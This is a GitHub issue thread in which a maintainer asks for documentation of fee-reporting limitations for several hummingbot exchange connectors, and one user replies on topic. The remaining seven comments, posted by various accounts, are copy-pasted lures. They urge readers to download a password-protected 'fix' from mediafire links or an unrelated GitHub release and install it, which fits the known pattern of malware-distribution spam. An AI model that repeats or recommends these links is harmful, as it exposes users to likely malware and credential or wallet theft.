### ISSUE TITLE
Fees limitation in connectors page

### ISSUE THREAD

**Issue by dennisocana** [hummingbot/hummingbot#4936]
While fixing the fees issue in [#2084](https://github.com/CoinAlpha/hummingbot/issues/2084), engineering discovered that some exchanges do not include fee or trade events through websocket. As a result, we can only estimate the fees which may result to the performance calculation to be incorrect if the user is on a different fee tier level.

Add a "Limitation" section in each connector page with the information stated above:

- `kucoin` (does not provide fee information)
- `okex` (does not provide trade events)
- `beaxy` (does not provide fee information)
- `blocktane` (does not provide fee information)
- `coinzoom` (does not provide fee information)
- `digifinex` (does not provide fee information)

**Comment by sisco0** [comment]
It would be good to have a programmatic way to know about these limitations somehow.

**Comment by FoioMikael** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Satyam1Deepu** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by NEKO-JOJUK** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by louseee** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
